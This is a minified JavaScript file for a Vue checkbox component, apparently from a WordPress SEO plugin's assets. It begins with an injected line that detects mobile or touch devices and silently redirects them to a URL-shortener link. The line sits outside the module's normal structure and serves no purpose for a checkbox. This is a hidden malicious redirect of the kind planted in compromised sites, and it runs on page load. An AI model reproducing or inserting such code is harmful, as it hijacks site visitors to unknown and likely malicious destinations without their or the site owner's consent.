(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{S as u}from"./Checkmark.51de2d05.js";import{aq as d,f as m,i as f,B as r,j as s,P as o,a0 as g,T as p,af as c}from"./vendor-vue-ui.232c7c36.js";import{_ as b}from"./_plugin-vue_export-helper.eefbdd86.js";const _={components:{SvgCheckmark:u},props:{modelValue:Boolean,name:String,labelClass:{type:String,default(){return""}},inputClass:{type:String,default(){return""}},id:String,size:String,disabled:Boolean,round:Boolean,type:{type:String,default(){return"blue"}}},methods:{labelToggle(){this.$refs.input.click()}}},k={class:"form-checkbox-wrapper"},y={class:"form-checkbox"},h=["checked","name","id","disabled"];function x(l,n,e,B,C,t){const i=d("svg-checkmark");return m(),f("label",{class:o(["aioseo-checkbox",[e.labelClass,{[e.size]:e.size},{disabled:e.disabled},{round:e.round}]]),onKeydown:[n[1]||(n[1]=c((...a)=>t.labelToggle&&t.labelToggle(...a),["enter"])),n[2]||(n[2]=c((...a)=>t.labelToggle&&t.labelToggle(...a),["space"]))],onClick:p(()=>{},["stop"])},[r(l.$slots,"header"),s("span",k,[s("span",y,[s("input",{type:"checkbox",onInput:n[0]||(n[0]=a=>l.$emit("update:modelValue",a.target.checked)),checked:e.modelValue,name:e.name,id:e.id,class:o(e.inputClass),disabled:e.disabled,ref:"input"},null,42,h),s("span",{class:o(["fancy-checkbox",e.type])},[g(i)],2)])]),r(l.$slots,"default")],34)}const v=b(_,[["render",x]]);export{v as B};
